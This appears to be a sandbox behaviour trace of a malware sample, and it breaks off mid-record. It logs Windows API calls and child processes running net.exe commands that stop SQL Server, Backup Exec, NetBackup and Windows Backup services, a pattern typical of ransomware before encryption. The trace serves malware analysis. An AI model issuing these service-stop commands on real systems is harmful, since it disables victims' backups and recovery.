[0099.621] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc2, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The UPnP Device Host service is starting") returned 0x28 [0099.622] GetFileType (hFile=0x30c) returned 0x3 [0099.622] LocalAlloc (uFlags=0x0, uBytes=0x50) returned 0x2e6150 [0099.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The UPnP Device Host service is starting", cchWideChar=40, lpMultiByteStr=0x2e6150, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The UPnP Device Host service is starting", lpUsedDefaultChar=0x0) returned 40 [0099.622] WriteFile (in: hFile=0x30c, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0) returned 0 [0099.622] LocalFree (hMem=0x2e6150) returned 0x0 [0099.622] NetapipBufferAllocate () returned 0x0 [0099.622] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x22fcd0 | out: _Buffer=".") returned 1 [0099.623] GetFileType (hFile=0x30c) returned 0x3 [0099.623] LocalAlloc (uFlags=0x0, uBytes=0x2) returned 0x2e6150 [0099.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x2e6150, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".\x8e.", lpUsedDefaultChar=0x0) returned 1 [0099.623] WriteFile (in: hFile=0x30c, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x22fca4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fca4, lpOverlapped=0x0) returned 0 [0099.623] LocalFree (hMem=0x2e6150) returned 0x0 [0099.623] Sleep (dwMilliseconds=0x7d0) [0102.059] NetApiBufferFree (Buffer=0x2e7e38) returned 0x0 [0102.059] NetServiceControl (in: servername=0x0, service="UPNPHOST", opcode=0x0, arg=0x0, bufptr=0x22fd00 | out: bufptr=0x22fd00) returned 0x0 [0102.227] _vsnwprintf_s (in: _Buffer=0x404880, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x22fcd0 | out: _Buffer="\r\n") returned 2 [0102.227] GetFileType (hFile=0x30c) returned 0x3 [0102.227] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6150 [0102.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0102.227] WriteFile (in: hFile=0x30c, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fca4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fca4, lpOverlapped=0x0) returned 0 [0102.227] LocalFree (hMem=0x2e6150) returned 0x0 [0102.227] GetServiceDisplayNameW (in: hSCManager=0x2e54a8, lpServiceName="UPNPHOST", lpDisplayName=0x401fc0, lpcchBuffer=0x22fcc8 | out: lpDisplayName="UPnP Device Host", lpcchBuffer=0x22fcc8) returned 1 [0102.228] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdc4, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The UPnP Device Host service was started successfully.\r\n") returned 0x38 [0102.228] GetFileType (hFile=0x30c) returned 0x3 [0102.228] LocalAlloc (uFlags=0x0, uBytes=0x70) returned 0x2e6150 [0102.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The UPnP Device Host service was started successfully.\r\n", cchWideChar=56, lpMultiByteStr=0x2e6150, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The UPnP Device Host service was started successfully.\r\n\x8ca.", lpUsedDefaultChar=0x0) returned 56 [0102.228] WriteFile (in: hFile=0x30c, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0) returned 0 [0102.228] LocalFree (hMem=0x2e6150) returned 0x0 [0102.228] GetFileType (hFile=0x30c) returned 0x3 [0102.228] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6150 [0102.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0102.228] WriteFile (in: hFile=0x30c, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x22fc74, lpOverlapped=0x0) returned 0 [0102.228] LocalFree (hMem=0x2e6150) returned 0x0 [0102.228] NetApiBufferFree (Buffer=0x2e7e38) returned 0x0 [0102.228] NetApiBufferFree (Buffer=0x2e7748) returned 0x0 [0102.229] NetApiBufferFree (Buffer=0x2e1ae0) returned 0x0 [0102.229] NetApiBufferFree (Buffer=0x2e1af8) returned 0x0 [0102.229] GetCommandLineW () returned="C:\\Windows\\system32\\net1 start upnphost /y" [0102.229] exit (_Code=0) Process: id = "83" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1c71c000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 449 os_tid = 0xef0 Process: id = "84" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1eb41000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 450 os_tid = 0xefc Process: id = "85" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1c746000" os_pid = "0xf0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 451 os_tid = 0xf10 Process: id = "86" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25e66000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 452 os_tid = 0xf24 Process: id = "87" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x22f61000" os_pid = "0xf34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x808" cmd_line = "C:\\Windows\\system32\\net1 stop NetBackup BMR MTFTP Service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 453 os_tid = 0xf38 [0100.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fe34 | out: lpSystemTimeAsFileTime=0x14fe34*(dwLowDateTime=0x1157fb10, dwHighDateTime=0x1d6f0d1)) [0100.137] GetCurrentProcessId () returned 0xf34 [0100.137] GetCurrentThreadId () returned 0xf38 [0100.137] GetTickCount () returned 0x114d366 [0100.137] QueryPerformanceCounter (in: lpPerformanceCount=0x14fe2c | out: lpPerformanceCount=0x14fe2c*=21923792584) returned 1 [0100.137] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0100.137] __set_app_type (_Type=0x1) [0100.137] __p__fmode () returned 0x770331f4 [0100.138] __p__commode () returned 0x770331fc [0100.138] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0100.138] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0100.138] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.138] GetConsoleOutputCP () returned 0x1b5 [0100.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0100.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.142] sprintf_s (in: _DstBuf=0x14fdec, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.142] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.145] GetStdHandle (nStdHandle=0xfffffff5) returned 0x30c [0100.145] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.145] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetBackup BMR MTFTP Service /y" [0100.145] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14fbb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0100.145] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x96) returned 0x584ad8 [0100.145] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.145] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fdbc | out: Buffer=0x14fdbc*=0x581b10) returned 0x0 [0100.145] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fdbc | out: Buffer=0x14fdbc*=0x581b28) returned 0x0 [0100.145] _fileno (_File=0x77032900) returned -2 [0100.145] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0100.145] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.145] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.145] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.145] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.146] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.146] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.146] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.146] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.146] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.146] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.146] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.146] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.146] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.146] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.146] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.146] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.146] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.146] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.146] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.146] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.146] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.146] _wcsicmp (_String1="accounts", _String2="NetBackup") returned -13 [0100.146] _wcsicmp (_String1="computer", _String2="NetBackup") returned -11 [0100.146] _wcsicmp (_String1="config", _String2="NetBackup") returned -11 [0100.146] _wcsicmp (_String1="continue", _String2="NetBackup") returned -11 [0100.146] _wcsicmp (_String1="cont", _String2="NetBackup") returned -11 [0100.146] _wcsicmp (_String1="file", _String2="NetBackup") returned -8 [0100.146] _wcsicmp (_String1="files", _String2="NetBackup") returned -8 [0100.147] _wcsicmp (_String1="group", _String2="NetBackup") returned -7 [0100.147] _wcsicmp (_String1="groups", _String2="NetBackup") returned -7 [0100.147] _wcsicmp (_String1="help", _String2="NetBackup") returned -6 [0100.147] _wcsicmp (_String1="helpmsg", _String2="NetBackup") returned -6 [0100.147] _wcsicmp (_String1="localgroup", _String2="NetBackup") returned -2 [0100.147] _wcsicmp (_String1="pause", _String2="NetBackup") returned 2 [0100.147] _wcsicmp (_String1="session", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="sessions", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="sess", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="share", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="start", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="stats", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="statistics", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="stop", _String2="NetBackup") returned 5 [0100.147] _wcsicmp (_String1="time", _String2="NetBackup") returned 6 [0100.147] _wcsicmp (_String1="user", _String2="NetBackup") returned 7 [0100.147] _wcsicmp (_String1="users", _String2="NetBackup") returned 7 [0100.147] _wcsicmp (_String1="msg", _String2="NetBackup") returned -1 [0100.147] _wcsicmp (_String1="messenger", _String2="NetBackup") returned -1 [0100.147] _wcsicmp (_String1="receiver", _String2="NetBackup") returned 4 [0100.147] _wcsicmp (_String1="rcv", _String2="NetBackup") returned 4 [0100.147] _wcsicmp (_String1="netpopup", _String2="NetBackup") returned 14 [0100.147] _wcsicmp (_String1="redirector", _String2="NetBackup") returned 4 [0100.147] _wcsicmp (_String1="redir", _String2="NetBackup") returned 4 [0100.147] _wcsicmp (_String1="rdr", _String2="NetBackup") returned 4 [0100.147] _wcsicmp (_String1="workstation", _String2="NetBackup") returned 9 [0100.147] _wcsicmp (_String1="work", _String2="NetBackup") returned 9 [0100.148] _wcsicmp (_String1="wksta", _String2="NetBackup") returned 9 [0100.148] _wcsicmp (_String1="prdr", _String2="NetBackup") returned 2 [0100.148] _wcsicmp (_String1="devrdr", _String2="NetBackup") returned -10 [0100.148] _wcsicmp (_String1="lanmanworkstation", _String2="NetBackup") returned -2 [0100.148] _wcsicmp (_String1="server", _String2="NetBackup") returned 5 [0100.148] _wcsicmp (_String1="svr", _String2="NetBackup") returned 5 [0100.148] _wcsicmp (_String1="srv", _String2="NetBackup") returned 5 [0100.148] _wcsicmp (_String1="lanmanserver", _String2="NetBackup") returned -2 [0100.148] _wcsicmp (_String1="alerter", _String2="NetBackup") returned -13 [0100.148] _wcsicmp (_String1="netlogon", _String2="NetBackup") returned 10 [0100.148] _wcsicmp (_String1="accounts", _String2="BMR") returned -1 [0100.148] _wcsicmp (_String1="computer", _String2="BMR") returned 1 [0100.148] _wcsicmp (_String1="config", _String2="BMR") returned 1 [0100.148] _wcsicmp (_String1="continue", _String2="BMR") returned 1 [0100.148] _wcsicmp (_String1="cont", _String2="BMR") returned 1 [0100.148] _wcsicmp (_String1="file", _String2="BMR") returned 4 [0100.148] _wcsicmp (_String1="files", _String2="BMR") returned 4 [0100.148] _wcsicmp (_String1="group", _String2="BMR") returned 5 [0100.148] _wcsicmp (_String1="groups", _String2="BMR") returned 5 [0100.148] _wcsicmp (_String1="help", _String2="BMR") returned 6 [0100.148] _wcsicmp (_String1="helpmsg", _String2="BMR") returned 6 [0100.148] _wcsicmp (_String1="localgroup", _String2="BMR") returned 10 [0100.148] _wcsicmp (_String1="pause", _String2="BMR") returned 14 [0100.149] _wcsicmp (_String1="session", _String2="BMR") returned 17 [0100.149] _wcsicmp (_String1="sessions", _String2="BMR") returned 17 [0100.149] _wcsicmp (_String1="sess", _String2="BMR") returned 17 [0100.149] _wcsicmp (_String1="share", _String2="BMR") returned 17 [0100.166] _wcsicmp (_String1="start", _String2="BMR") returned 17 [0100.166] _wcsicmp (_String1="stats", _String2="BMR") returned 17 [0100.166] _wcsicmp (_String1="statistics", _String2="BMR") returned 17 [0100.166] _wcsicmp (_String1="stop", _String2="BMR") returned 17 [0100.166] _wcsicmp (_String1="time", _String2="BMR") returned 18 [0100.166] _wcsicmp (_String1="user", _String2="BMR") returned 19 [0100.166] _wcsicmp (_String1="users", _String2="BMR") returned 19 [0100.166] _wcsicmp (_String1="msg", _String2="BMR") returned 11 [0100.166] _wcsicmp (_String1="messenger", _String2="BMR") returned 11 [0100.166] _wcsicmp (_String1="receiver", _String2="BMR") returned 16 [0100.166] _wcsicmp (_String1="rcv", _String2="BMR") returned 16 [0100.166] _wcsicmp (_String1="netpopup", _String2="BMR") returned 12 [0100.166] _wcsicmp (_String1="redirector", _String2="BMR") returned 16 [0100.167] _wcsicmp (_String1="redir", _String2="BMR") returned 16 [0100.167] _wcsicmp (_String1="rdr", _String2="BMR") returned 16 [0100.167] _wcsicmp (_String1="workstation", _String2="BMR") returned 21 [0100.167] _wcsicmp (_String1="work", _String2="BMR") returned 21 [0100.167] _wcsicmp (_String1="wksta", _String2="BMR") returned 21 [0100.167] _wcsicmp (_String1="prdr", _String2="BMR") returned 14 [0100.167] _wcsicmp (_String1="devrdr", _String2="BMR") returned 2 [0100.167] _wcsicmp (_String1="lanmanworkstation", _String2="BMR") returned 10 [0100.167] _wcsicmp (_String1="server", _String2="BMR") returned 17 [0100.167] _wcsicmp (_String1="svr", _String2="BMR") returned 17 [0100.167] _wcsicmp (_String1="srv", _String2="BMR") returned 17 [0100.167] _wcsicmp (_String1="lanmanserver", _String2="BMR") returned 10 [0100.167] _wcsicmp (_String1="alerter", _String2="BMR") returned -1 [0100.167] _wcsicmp (_String1="netlogon", _String2="BMR") returned 12 [0100.167] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0100.167] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.168] wcscpy_s (in: _Destination=0x14f8bc, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0100.168] LoadLibraryW (lpLibFileName="neth.dll") returned 0x71240000 [0100.296] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x14f8b8, nSize=0x0, Arguments=0x14f8b4 | out: lpBuffer="勀Xneth.dll") returned 0xff [0100.304] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0100.304] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0100.305] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0100.305] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0100.305] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.305] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0100.305] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0100.305] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0100.305] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.305] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0100.305] _wcsicmp (_String1="CONT", _String2="NetBackup") returned -11 [0100.305] _wcsicmp (_String1="CONT", _String2="BMR") returned 1 [0100.305] _wcsicmp (_String1="CONT", _String2="MTFTP") returned -10 [0100.305] _wcsicmp (_String1="CONT", _String2="Service") returned -16 [0100.305] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.305] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0100.305] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.305] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0100.306] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.306] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0100.306] _wcsicmp (_String1="FILES", _String2="NetBackup") returned -8 [0100.306] _wcsicmp (_String1="FILES", _String2="BMR") returned 4 [0100.306] _wcsicmp (_String1="FILES", _String2="MTFTP") returned -7 [0100.306] _wcsicmp (_String1="FILES", _String2="Service") returned -13 [0100.306] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.306] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0100.306] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.306] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0100.306] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.306] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0100.306] _wcsicmp (_String1="GROUPS", _String2="NetBackup") returned -7 [0100.306] _wcsicmp (_String1="GROUPS", _String2="BMR") returned 5 [0100.306] _wcsicmp (_String1="GROUPS", _String2="MTFTP") returned -6 [0100.306] _wcsicmp (_String1="GROUPS", _String2="Service") returned -12 [0100.306] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.306] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0100.306] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.306] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0100.306] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.306] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0100.306] _wcsicmp (_String1="REPL", _String2="NetBackup") returned 4 [0100.306] _wcsicmp (_String1="REPL", _String2="BMR") returned 16 [0100.307] _wcsicmp (_String1="REPL", _String2="MTFTP") returned 5 [0100.307] _wcsicmp (_String1="REPL", _String2="Service") returned -1 [0100.307] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0100.307] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.307] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0100.307] _wcsicmp (_String1="REPLICATOR", _String2="NetBackup") returned 4 [0100.307] _wcsicmp (_String1="REPLICATOR", _String2="BMR") returned 16 [0100.307] _wcsicmp (_String1="REPLICATOR", _String2="MTFTP") returned 5 [0100.307] _wcsicmp (_String1="REPLICATOR", _String2="Service") returned -1 [0100.307] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.307] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0100.307] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.307] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0100.307] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.307] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0100.307] _wcsicmp (_String1="SESSIONS", _String2="NetBackup") returned 5 [0100.307] _wcsicmp (_String1="SESSIONS", _String2="BMR") returned 17 [0100.307] _wcsicmp (_String1="SESSIONS", _String2="MTFTP") returned 6 [0100.307] _wcsicmp (_String1="SESSIONS", _String2="Service") returned 1 [0100.307] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0100.307] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.307] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0100.307] _wcsicmp (_String1="SESS", 